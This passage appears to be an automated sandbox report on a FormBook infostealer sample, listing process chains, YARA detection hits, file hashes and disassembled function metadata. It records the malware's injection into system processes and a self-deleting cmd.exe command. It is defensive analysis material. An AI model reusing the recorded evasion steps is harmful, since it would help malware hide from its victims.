                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.658248909.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.657825890.0000000003382000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: lTAPQJikGw.exe PID: 6192 Parent PID: 7056

                                                                      General

                                                                      Start time:18:06:51
                                                                      Start date:10/06/2021
                                                                      Path:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\lTAPQJikGw.exe
                                                                      Imagebase:0xa50000
                                                                      File size:865792 bytes
                                                                      MD5 hash:16657FA097CD334973A5489EEFF8BAFE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.730022102.0000000001810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.727807565.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.656408527.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.729969001.00000000017E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: explorer.exe PID: 3424 Parent PID: 6192

                                                                      General

                                                                      Start time:18:06:54
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff6fee60000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: control.exe PID: 6848 Parent PID: 6192

                                                                      General

                                                                      Start time:18:07:24
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\control.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\control.exe
                                                                      Imagebase:0xe00000
                                                                      File size:114688 bytes
                                                                      MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916418172.0000000000DA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916260841.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.916447629.0000000000DD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:moderate

                                                                      Chronological Activities

                                                                      Analysis Process: cmd.exe PID: 6952 Parent PID: 6848

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Users\user\Desktop\lTAPQJikGw.exe'
                                                                      Imagebase:0x11d0000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: conhost.exe PID: 6936 Parent PID: 6952

                                                                      General

                                                                      Start time:18:07:26
                                                                      Start date:10/06/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff724c50000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >

                                                                        Analysis Process: lTAPQJikGw.exe PID: 7056 Parent PID: 5976 lTAPQJikGw.exeCOMMON

                                                                        Executed Functions

                                                                        Function 01870D80, Relevance: .6, Instructions: 594COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 089fd52d0b2a0b2608defd6362b5aeeb52423270cc272f1adf8027d1a00cb759
                                                                        • Instruction ID: 01ef757c8d24786db89704e59557f52dc0671a7b16e27bbda5890911bba11720
                                                                        • Opcode Fuzzy Hash: 089fd52d0b2a0b2608defd6362b5aeeb52423270cc272f1adf8027d1a00cb759
                                                                        • Instruction Fuzzy Hash: DDD1CE71B007058FEB29DB7AC450BAEBBF6AF89704F14846ED145CB690CB35EA05CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581D0C0, Relevance: .2, Instructions: 240COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69d113942cc9431860ae4568d4e62931bd7c60be897df141497e01f038fa5bd3
                                                                        • Instruction ID: 030c577616655e4d09955c5d9ed487c488709a0a931efff9204ac42981774e11
                                                                        • Opcode Fuzzy Hash: 69d113942cc9431860ae4568d4e62931bd7c60be897df141497e01f038fa5bd3
                                                                        • Instruction Fuzzy Hash: 13A11570E05218CBDB14DFA9C884BAEBBB6BF89314F10C1A9D908FB204EB305D858F55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3B264, Relevance: .2, Instructions: 233COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d97e41393853296312e54419c92c5dd6a482814714d21bed2296891fbeca4b08
                                                                        • Instruction ID: e33d8ec736fd80dfb3b2976dda73ff3362a6e4d59a736fbea486c3fb2fdb69bc
                                                                        • Opcode Fuzzy Hash: d97e41393853296312e54419c92c5dd6a482814714d21bed2296891fbeca4b08
                                                                        • Instruction Fuzzy Hash: 7F918F35E003198FCB08DBE4C8549DDBBBAFFC9304F548255E515AB3A4DB70A995CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3DF50, Relevance: .2, Instructions: 220COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af41ea13108d25173ec090ecedf30125a3591e3df3c536cca1316b54b75563f9
                                                                        • Instruction ID: 635a2d3133b86cc89670a446fe19c12bebc285f8abfd5a80a72d58ba140a3a84
                                                                        • Opcode Fuzzy Hash: af41ea13108d25173ec090ecedf30125a3591e3df3c536cca1316b54b75563f9
                                                                        • Instruction Fuzzy Hash: C591DF35E003198FCB08DBE0D8509DDBBB6FFCA304F158256E515AB3A5EB30A996CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581D0B0, Relevance: .2, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fe3af6db3e8bf6c8984480dc0fd18fd7e4b2d55c82a26dd3a67e583fdf3b03b1
                                                                        • Instruction ID: 199da1a5ca6622ee4c1a26be09ad67097de2dce517aa36e068a73405e372ec11
                                                                        • Opcode Fuzzy Hash: fe3af6db3e8bf6c8984480dc0fd18fd7e4b2d55c82a26dd3a67e583fdf3b03b1
                                                                        • Instruction Fuzzy Hash: CA813870E05218CBDB14DFA9C884BADBBB6BF89314F10C1A9D908FB255EB305E858F55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01870751, Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e635d96873084d6f3e759fa6ea2c993d727ea92a2338d04cf7bcdd3f3040de05
                                                                        • Instruction ID: 30d48bca910c4a80d3434eaaefe026fa1712c383c7e65e2af84f8fa10879c940
                                                                        • Opcode Fuzzy Hash: e635d96873084d6f3e759fa6ea2c993d727ea92a2338d04cf7bcdd3f3040de05
                                                                        • Instruction Fuzzy Hash: AC119E31C04228CBDB118FA5D5187FDBBF0AB0E311F14946AE151F7290C7798A84DF64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01870760, Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fba31e91d09c848c2a90cdd1027395547715cbddc8204bfad7b22c309b7ee69
                                                                        • Instruction ID: 67f78f6c66555e2cb52bc7e7384043f5057f4148407656211dd46983fec2ba1b
                                                                        • Opcode Fuzzy Hash: 0fba31e91d09c848c2a90cdd1027395547715cbddc8204bfad7b22c309b7ee69
                                                                        • Instruction Fuzzy Hash: 09113530D042188BDB148FA9D458BFEFBF0AB0E355F149069E451B7290C7798A84DFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B36B80, Relevance: 6.1, APIs: 4, Instructions: 125threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36BF0
                                                                        • GetCurrentThread.KERNEL32 ref: 01B36C2D
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36C6A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01B36CC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: c20756e2fedf94d0615ea939bbfed329db63a830cfdc64ec1e675af20caa19ba
                                                                        • Instruction ID: 53e086695b3f69a12c815f2619456be1625e9b49832b1c044a55667f81bc3b43
                                                                        • Opcode Fuzzy Hash: c20756e2fedf94d0615ea939bbfed329db63a830cfdc64ec1e675af20caa19ba
                                                                        • Instruction Fuzzy Hash: EA5164B4D002489FDB18CFAAD58879EBFF0FF89314F2080AAE418A7250D774A944CF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B36B90, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36BF0
                                                                        • GetCurrentThread.KERNEL32 ref: 01B36C2D
                                                                        • GetCurrentProcess.KERNEL32 ref: 01B36C6A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 01B36CC3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: a256ea4746d4c92110758c450be7c0610c567119252323bcba583b8b4e5d9fa6
                                                                        • Instruction ID: 465024a718d09e07dcf9c398f3218edde88ab117535cd55aed9812f5ac47818b
                                                                        • Opcode Fuzzy Hash: a256ea4746d4c92110758c450be7c0610c567119252323bcba583b8b4e5d9fa6
                                                                        • Instruction Fuzzy Hash: 195153B4D002499FDB18CFAAD588BDEBBF0FF89314F20846AE419A7250D774A944CF65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581FE70, Relevance: 2.6, Strings: 2, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $%!l$$%!l
                                                                        • API String ID: 0-1936874252
                                                                        • Opcode ID: 616a5aabe8cc986e15f7e7c1b47ab3efa1d67cac55c89af4c849560d1446fa09
                                                                        • Instruction ID: e216200096cc0633024fb04bd75c75b80a83162b193bb8867a1ad72493f3762f
                                                                        • Opcode Fuzzy Hash: 616a5aabe8cc986e15f7e7c1b47ab3efa1d67cac55c89af4c849560d1446fa09
                                                                        • Instruction Fuzzy Hash: 4331A0707006118BCB28EB39C4A462E77A6AF89608F14887CDE0ACF795CF75DC058BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3BBB8, Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01B3BE0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 27cdf62b7709de635cb15ed76f4f551c6b889cda6a0a7fac49b0b37773041606
                                                                        • Instruction ID: 01b196cc87b995e979087387a5c49b5cdd61361fca0f4f8ddcf4c8fbe4af0fda
                                                                        • Opcode Fuzzy Hash: 27cdf62b7709de635cb15ed76f4f551c6b889cda6a0a7fac49b0b37773041606
                                                                        • Instruction Fuzzy Hash: 9C814570A00B058FDB28CF2AD55475ABBF1FF88204F008A6DD586DBB54DB75E8158B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3DC6D, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B3DD8A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: ebbb030fdf788d59cae416b8832da474c7b63ad45058b8ed9067a3641c1c6b8c
                                                                        • Instruction ID: b99c2649046979138d28bb9fb3f05a4d1ed375876ca69a0b0b737599a88bb592
                                                                        • Opcode Fuzzy Hash: ebbb030fdf788d59cae416b8832da474c7b63ad45058b8ed9067a3641c1c6b8c
                                                                        • Instruction Fuzzy Hash: BC51C0B1D003089FDF14CF9AC884ADEBBB5FF88310F64816AE819AB250D7719895CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3DC78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01B3DD8A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f93f20c994cee3d41e81dc86d44c66cab0a8d81aab7a0c2d211ea2e70a3cbf19
                                                                        • Instruction ID: a557d56b462c8bc937431910557b255062e233a81683735db5525edfc20dbfb6
                                                                        • Opcode Fuzzy Hash: f93f20c994cee3d41e81dc86d44c66cab0a8d81aab7a0c2d211ea2e70a3cbf19
                                                                        • Instruction Fuzzy Hash: 4141CFB1D003089FDB14CF9AC884ADEBBB5FF88310F64812AE819AB250D7759895CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B36D41, Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 66bfd9d1fd6791a7cc59b76bd794647cbfa40d4c509496e6e11c6c01728f774e
                                                                        • Instruction ID: f16fe638837dbe98a955c965b93b676dc120c442858b036cb9d01fbc48c5d831
                                                                        • Opcode Fuzzy Hash: 66bfd9d1fd6791a7cc59b76bd794647cbfa40d4c509496e6e11c6c01728f774e
                                                                        • Instruction Fuzzy Hash: 56414C76900258AFCF01CF99D844AEEBFF5FB89310F14806AEA14A7361C7759954DFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0581DC23, Relevance: 1.6, Strings: 1, Instructions: 335COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.660692402.0000000005810000.00000040.00000001.sdmp, Offset: 05810000, based on PE: false
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D0%l
                                                                        • API String ID: 0-3182299250
                                                                        • Opcode ID: 16a8e27cab51e4e1c3691c8290bcab88756c6756c2ab95ca78c2674b5ac595cb
                                                                        • Instruction ID: ae293373df9b2371245571148079a249c790145fa282cf206f5dc49c1cf8cce9
                                                                        • Opcode Fuzzy Hash: 16a8e27cab51e4e1c3691c8290bcab88756c6756c2ab95ca78c2674b5ac595cb
                                                                        • Instruction Fuzzy Hash: 69C18D70E0A2098FCB14DFB8C4407AEBBF6BB88358F108169DD16EB355EB348D458B95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B36DB0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: cd9c786c831e6dc5dfaedda5cbc1126081892e34a6bc55fe7386d50262b561a2
                                                                        • Instruction ID: c2f038ea7d4f5ba696ab53d5e464b5a480010b1ee6031ffcbcf43d61fb3e8109
                                                                        • Opcode Fuzzy Hash: cd9c786c831e6dc5dfaedda5cbc1126081892e34a6bc55fe7386d50262b561a2
                                                                        • Instruction Fuzzy Hash: 5921E0B5900218AFDB10CFAAD884BDEBFF8FB48324F14801AE914A3350D374A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B36DB8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B36E3F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: 5c8b1e1640044c1f95c40a7e81df2cc8efe2327fbdfd67d3cbd08f637c49cc17
                                                                        • Instruction ID: e62ba361fa79d2c5df8bf2e2e991026c1504e6d45ae298bdb827291acaa59a72
                                                                        • Opcode Fuzzy Hash: 5c8b1e1640044c1f95c40a7e81df2cc8efe2327fbdfd67d3cbd08f637c49cc17
                                                                        • Instruction Fuzzy Hash: 5821C2B5900218AFDB10CFAAD884BDEFBF8FB48324F14841AE914A3350D375A954CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3B0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01B3BE89,00000800,00000000,00000000), ref: 01B3C09A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 92e6decbaff616c6b093dc9be37f413fcdeccd6ae739406eb0ed7cc3daab95f4
                                                                        • Instruction ID: 3c216bbc7ad92e7a5689782207394d65ce9fbfb56cc347fee30bb8ca45455d28
                                                                        • Opcode Fuzzy Hash: 92e6decbaff616c6b093dc9be37f413fcdeccd6ae739406eb0ed7cc3daab95f4
                                                                        • Instruction Fuzzy Hash: E81114B69002488FDB14CF9AC444BDEFBF4EB89324F14846EE915B7200C3B5A555CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3C028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01B3BE89,00000800,00000000,00000000), ref: 01B3C09A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: 578a91be25be0dadb514d141eda58026ef8af012409902e6e5053fc36219a2dc
                                                                        • Instruction ID: bcd29bb9b81479ee63e369cce1c7ed36e16aa3cdd91e92891951a562668a0205
                                                                        • Opcode Fuzzy Hash: 578a91be25be0dadb514d141eda58026ef8af012409902e6e5053fc36219a2dc
                                                                        • Instruction Fuzzy Hash: 111133B28002498FDB14CFAAC484BDEFBF4EB8A324F14856AE515B7200C375A549CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01871550, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 018715B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 7d32787352a46cd9c16dbbe681eb0c958599c456b2e5e16348e5842fc3087351
                                                                        • Instruction ID: c41c6df463877bd668e17e97f0d380b15ea4b02b925cc45ddf9f457104781a6e
                                                                        • Opcode Fuzzy Hash: 7d32787352a46cd9c16dbbe681eb0c958599c456b2e5e16348e5842fc3087351
                                                                        • Instruction Fuzzy Hash: F61136B68002098FDB10CF99C5897DEBBF4FB48324F15841AD559A7740C378A689CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 01B3BE0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657619128.0000000001B30000.00000040.00000001.sdmp, Offset: 01B30000, based on PE: false
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 44c4a0717643d5062340745307192b3ef81afb452fdcddc6abf1bd45c8ce5e82
                                                                        • Instruction ID: 63c369cb6d33fb9ec773766964bc0d4dc7cdff638445bbd8e587dd3a4a6751d7
                                                                        • Opcode Fuzzy Hash: 44c4a0717643d5062340745307192b3ef81afb452fdcddc6abf1bd45c8ce5e82
                                                                        • Instruction Fuzzy Hash: A11110B2C002498FDB14CF9AC448BDEFBF4EB88324F10846AD929A7600C375A545CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01871558, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 018715B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.657582877.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: false
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 935d8bee533eb7d2388474a289264d0ce81269b1a429769bd1047390244ad960
                                                                        • Instruction ID: f8818bcca77425ac209d44b8ea98dea975d29af6e43617be9e47c67e5ff1d7c9
                                                                        • Opcode Fuzzy Hash: 935d8bee533eb7d2388474a289264d0ce81269b1a429769bd1047390244ad960
                                                                        • Instruction Fuzzy Hash: B91115B18002498FDB10CF99C489BDEFBF4FB48324F14842AE959A7740D779A684CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01B3DEB9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
